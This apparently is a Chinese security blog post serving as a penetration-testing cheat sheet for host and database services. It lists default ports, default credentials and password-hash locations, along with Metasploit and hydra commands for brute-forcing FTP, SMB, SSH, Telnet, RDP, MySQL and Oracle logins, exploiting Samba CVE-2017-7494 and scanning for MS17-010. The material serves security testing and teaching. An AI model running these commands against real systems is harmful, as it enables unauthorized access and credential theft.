主机与数据库安全

主机与数据库安全

主机共享端口及漏洞利用/检测

FTP服务

端口: 21
  FTP是File Transfer Protocol (文议) 的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是件传输协一个应用程序( Application )。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一-种协议以传输文件。

直接访问ftp://xx.xx.xxxx

FTP暴力破解

ftp的爆破工具有很多,常见的暴力破解工具有hydra、medusa 超级弱口令爆破工具等,推荐使用msf中的ftp模块、超级弱口令爆破工具

use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.109.134
set USER_ FILE /home/dic/dic_username_ ftp.txt
set PASS_ FILE /home/dic/dic_ password_ ftp.txt
set THREADS 30
run

Samba概述

默认端口: 137、135、139、 445等
  Samba是linux和unix系统上实现smb协议的一个免费软件,由服务器及客户端程序构成Samba服务:对于这个可以在windows与Linux之间进行共享文件的服务同样是我们攻击的关注点; samba登录分为两种方式,一种是需要用户名口令; 另- -种是不需要用户名口令。在很多时候不光是pc机,还有一-些服务器, 网络设备都开放着此服务,方便进行文件共享,但是同时也给攻击者提供了便利。

默认端口: 445
  SMB(Server Message Block) Windows协议族,用于文件和打印共享服务。

Samba暴力破解

msf > use auxiliary/scanner/smb/smb_login (使用smb_login模块)

msf auxiliary(smb_ login) > show options (查看选项)

msf auxiliary(smb_ login) > set RHOSTS 10.180.100.10 (目标)

msf auxiliary(ssmb_ login) > set USER_ FILE /root/username.txt (用户名字典,或指定用户)

msf auxiliary(ssmb_ login) > set PASS_ _FILE /root/pass.txt (密码字典文件)

msf auxiliary(ssmb_ login) > exploit (开始)

Samba远程代码执行漏洞(CVE-2017-7494 )

使用Msfploit攻击
exploit/linux/samba/is_ known_ pipename
set RHOST 192.168.109.134
exploit

Samba -ms17 -010检测

使用mestasploit检测
use auxiliary/scanner/smb/smb_ ms17_ 010
set rhosts 10.0.0.1-10.0.0.254
set rport 445
run

主机远程连接端口及漏洞利用/检测

SSH概述

默认端口: 22
  SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定; SSH 为建立在应用层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有UNIX平台一-包括HP-UX、Linux、 AlX、 Solaris. Digital UNIX、Irix, 以及其他平台,都可运行SSH.

SSH暴力破解

测试工具: hydra、 metasploit、 超级弱口令检查工具
以metasploit为例
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.254
set USER FILE /root/user.txt
set PASS FILE /root/words.txt
set THREADS 30
run

Telnet概述

默认端口: 23
  Telnet协议是TEP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。 它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台.上输入一样。可以在本地就能控制服务器。要开始一个telnet会话,必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。

Telnet暴力破解

检测工具:hydra、超级弱口令检查工具、mestaploit

Mestaploit使用

msf > use auxiliary/scanner/telnet/telnet_ login (使用teInet_ login模块)
msf auxiliary(telnet login) > show options (查看 选项)
msf auxiliary(telnet login) > set RHOSTS 10.180.100.141 ( 目标)
msf auxiliary(telnet login) > set USER_ FILE /root/username.txt (用户名字典,或指定用户)
msf auxiliary(telnet login) > set PASS_ FILE /root/pass.txt (密码字典文件)
msf auxiliary(telnet_ login) > exploit (开始)

RDP概述

默认端口: 3389
  远程桌面协议(RDP)是一-个多 通道(multi-channel)的协议,让使用者(所在计算机称为用户端或本地计算机’)连上提供微软终端机服务的计算机(称为服务端或远程计算机")。

RDP暴力破解

工具: hydra: 超级弱口令爆破工具
hydra ip rdp -| administrator -P pass.txt -V

数据库服务端口及漏洞利用/检测

常见数据库连接工具

Navicat、phpMyAdmin、sqlyog、OBeaver

常见数据库密码存放位置

MySql(数据库名)——>mysql.user(密码存放位置)——>root/[空] (默认用户名/密码)

SQL Server(数据库名)——>sys.syslnklgns(密码存放位置)——>sa/ sa默认用户名/密码)

Oracle(数据库名)——>sys.dba_users(密码存放位置)——>internal / oracle | system /manager(默认用户名/密码)

Postgresql(数据库名)——>Postgresql.pg_shadow(密码存放位置)——>postgresql / [空]默认用户名/密码)

数据库的特性差异

MSSQL   sa  1433  Windows  高权限

MySQL  root  3306  Windows/Linux  低权限

Oracle  sys/system  1521  Windows/Linux  高权限

Mysql暴力破解

默认端口: 3306
  MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,属于Oracle旗下产品。
  MySQL是一种关系型数据库管理系统, 关系数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。

工具: hydra. 超级弱口令爆破工具、mestasploit
hydra ip mysql -| administrator -P pass.txt -V

mestasploit
msf > use auxiliary/scanner/mysql/mysql_login ( 使用mysql_login模块)
msf auxiliary(mysql _ogin) > show options (查看选项)
msf auxiliary(mysql_login) > set RHOSTS 192.168.230.176(目标)
msf auxiliary(mysql_login) > set USERNAME root (指定用户)
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt (密码字典文件)
msf auxiliary(mysql_login) > exploit (开始)

MSSQL(sqIserver)-暴力破解

默认端口: 1433
  MSSQL是指微软的SQLServer数据库服务器,它是一个数据库平台, 提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是-个数据库管理系统,用于建立、使用和维护数据库

工具: hydra、 超级弱口令爆破工具、metasploit

Metasploit爆破Oracle SID

Oracle爆破前得需要获取到目标的SID才可以进入下一步爆破的步骤
msf6 > use auxiliary/scanner/oracle/sid brute
msf6 auxiliary(scanner/oracle/sid brute) > set rhosts 10.20.24.244
msf6 auxiliary(scanner/oracle/sid brute) > set threads 10
msf6 auxiliary(scanner/oracle/sid brute) > run

拿到Oracle的SID后就可以开始对Oracle进行口令爆破了
msf6 > use auxiliary/scanner/oracle/oracle. login
msf6 auxiliary(scanner/oracle/oracle login) > set rhosts 10.20.24.244
msf6 auxiliary(scanner/oracle/oracle login) > set rports 1521
msf6 auxiliary(scanner/oracle/oracle. login) > set sid helowin
msf6 auxiliary(scanner/oracle/oracle login) > set threads 10
msf6 auxiliary(scanner/oracle/oracle. login) > run

Postgresql-暴力破解

默认端口: 5432
  PostgreSQL是一种特性非常齐全的自由软件的对象 关系型数据库管理系统(ORDBMS) , 是以加州大学计算机系开发的POSTGRES, 4.2版本为基础的对象关系型数据库管理系统。

测试工具: hydra. 超级弱口令爆破工具、metasploit

mongodb-未授权访问

默认端口: 27017
  MongoDB是-个基于分布式文件存储的数据库。由C++语言编写。旨在为WEB应用提供可扩展的高性
能数据存储解决方案。
  MongoDB是一个介于关系数据库和非关系数据库之间的产品, 是非关系数据库当中功能最丰富,最像关系数据库的。
  MongoDB默认端口27017,当配置成无验证时,存在未授权访问,使用msf中的scanner/mongodb/mongodb_ login模块进行测试,使用navicat连接获取数据库中的内容。

检测
use auxiliary/scanner/mongodb/mongodb_login
set rhosts 192.168.90.0/24
set threads 10
exploit

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值